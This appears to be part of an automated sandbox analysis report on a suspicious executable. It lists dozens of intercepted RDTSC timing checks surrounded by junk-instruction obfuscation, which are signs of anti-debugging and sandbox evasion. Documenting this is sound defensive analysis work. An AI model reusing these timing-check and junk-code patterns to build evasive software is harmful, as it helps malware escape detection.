          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A7AD7 second address: 8A7AF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D8FEC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A7AF1 second address: 8A7AF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A7AF5 second address: 8A7B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FE1C8D8FEC5h 0x0000000c pop edi 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A7B12 second address: 8A7B17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A770F second address: 8A771A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A771A second address: 8A7720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AA52D second address: 8AA540 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D8FEBFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AA540 second address: 8AA549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AA6C7 second address: 8AA6E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D8FEBDh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE1C8D8FEBEh 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AA6E6 second address: 8AA6EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81D0F0 second address: 81D0FA instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE1C8D8FEB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81D0FA second address: 81D161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FE1C8D96873h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007FE1C8D9686Bh 0x00000013 pushad 0x00000014 jmp 00007FE1C8D96873h 0x00000019 jbe 00007FE1C8D96866h 0x0000001f popad 0x00000020 push esi 0x00000021 ja 00007FE1C8D96866h 0x00000027 push eax 0x00000028 pop eax 0x00000029 pop esi 0x0000002a popad 0x0000002b pushad 0x0000002c jmp 00007FE1C8D96879h 0x00000031 push esi 0x00000032 jl 00007FE1C8D96866h 0x00000038 push ecx 0x00000039 pop ecx 0x0000003a pop esi 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e pop eax 0x0000003f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81D161 second address: 81D165 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF96C second address: 8AF972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B001B second address: 8B001F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B001F second address: 8B0025 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B0025 second address: 8B002A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B002A second address: 8B0049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jns 00007FE1C8D9686Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007FE1C8D9686Eh 0x00000017 push edx 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B0049 second address: 8B0065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FE1C8D8FEC0h 0x0000000b js 00007FE1C8D8FEB6h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B0065 second address: 8B0069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B0069 second address: 8B0071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 861ACC second address: 861B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 and edx, 3BD3CEF1h 0x0000000d push 00000004h 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FE1C8D96868h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 sbb cx, 6AFCh 0x0000002e nop 0x0000002f je 00007FE1C8D96874h 0x00000035 push eax 0x00000036 push edx 0x00000037 jno 00007FE1C8D96866h 0x0000003d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 861B0F second address: 861B1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 861B1C second address: 861B20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 861B20 second address: 861B26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B01DD second address: 8B01E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B01E1 second address: 8B01F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D8FEBAh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B01F7 second address: 8B01FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B01FB second address: 8B0209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FE1C8D8FEB6h 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B0209 second address: 8B020D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B0DE3 second address: 8B0DE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B0DE7 second address: 8B0E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f jc 00007FE1C8D96866h 0x00000015 jmp 00007FE1C8D96877h 0x0000001a pop edx 0x0000001b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B0E14 second address: 8B0E31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE1C8D8FEC9h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B0E31 second address: 8B0E3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D9686Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B5105 second address: 8B5109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B5109 second address: 8B511F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FE1C8D9686Bh 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4318 second address: 8B4331 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FE1C8D8FEBEh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4331 second address: 8B434D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE1C8D96875h 0x0000000b popad 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B434D second address: 8B4362 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FE1C8D8FEBFh 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4362 second address: 8B4366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4782 second address: 8B4788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4788 second address: 8B47AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FE1C8D96866h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007FE1C8D96866h 0x00000013 jmp 00007FE1C8D96873h 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B47AE second address: 8B47C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE1C8D8FEC3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B47C7 second address: 8B47CC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B47CC second address: 8B47EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FE1C8D8FEB6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE1C8D8FEC2h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B47EB second address: 8B47F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D9686Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B47F9 second address: 8B481B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a jmp 00007FE1C8D8FEBCh 0x0000000f jng 00007FE1C8D8FEB6h 0x00000015 pop edx 0x00000016 pushad 0x00000017 push esi 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4AF6 second address: 8B4B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE1C8D96876h 0x00000009 pop eax 0x0000000a push esi 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop esi 0x0000000e push ebx 0x0000000f jng 00007FE1C8D96866h 0x00000015 pop ebx 0x00000016 popad 0x00000017 pushad 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007FE1C8D9686Eh 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 jne 00007FE1C8D96866h 0x0000002b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4B3B second address: 8B4B3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B8C82 second address: 8B8C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B8C86 second address: 8B8C8C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B89BB second address: 8B89BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B89BF second address: 8B89C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C017F second address: 8C0183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 813404 second address: 81340A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81340A second address: 81340F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BE2B7 second address: 8BE2DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FE1C8D8FEC8h 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BE2DF second address: 8BE2E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BE2E5 second address: 8BE2F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BE2F2 second address: 8BE310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FE1C8D96879h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BE310 second address: 8BE316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BEE93 second address: 8BEEB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D96876h 0x00000007 jnp 00007FE1C8D96872h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BEEB3 second address: 8BEEB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF1CF second address: 8BF1D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF1D5 second address: 8BF1D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF1D9 second address: 8BF1F3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE1C8D96866h 0x00000008 jnl 00007FE1C8D96866h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 ja 00007FE1C8D9686Ah 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF1F3 second address: 8BF1FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FE1C8D8FEB6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF7E1 second address: 8BF7E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF7E5 second address: 8BF7EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF7EE second address: 8BF812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jne 00007FE1C8D9687Ch 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BFDE3 second address: 8BFDED instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE1C8D8FEBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BFDED second address: 8BFDF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6842 second address: 8C6847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6847 second address: 8C684C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C684C second address: 8C6860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FE1C8D8FEB6h 0x0000000a popad 0x0000000b pushad 0x0000000c jns 00007FE1C8D8FEB6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9891 second address: 8C98B4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE1C8D9687Dh 0x00000008 jmp 00007FE1C8D96877h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C98B4 second address: 8C98B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9A3F second address: 8C9A80 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE1C8D9686Eh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE1C8D9686Fh 0x00000015 jmp 00007FE1C8D96879h 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9A80 second address: 8C9A91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D8FEBBh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C9A91 second address: 8C9A96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CA116 second address: 8CA11A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CA289 second address: 8CA28D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CA28D second address: 8CA2A5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jg 00007FE1C8D8FEB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d jno 00007FE1C8D8FEC6h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CA435 second address: 8CA439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CA439 second address: 8CA44C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FE1C8D8FECEh 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D0B67 second address: 8D0B8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE1C8D96875h 0x00000009 jmp 00007FE1C8D9686Ah 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D0B8A second address: 8D0B8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D0B8E second address: 8D0B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D0B94 second address: 8D0BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE1C8D8FEC6h 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D0BB2 second address: 8D0BDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE1C8D96876h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jc 00007FE1C8D9688Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D0BDA second address: 8D0BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D1066 second address: 8D1070 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D1070 second address: 8D107A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE1C8D8FEB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D107A second address: 8D108F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE1C8D9686Fh 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D1795 second address: 8D179B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D179B second address: 8D179F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D179F second address: 8D17A5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D17A5 second address: 8D17AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D17AB second address: 8D17D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D8FEC5h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE1C8D8FEBEh 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
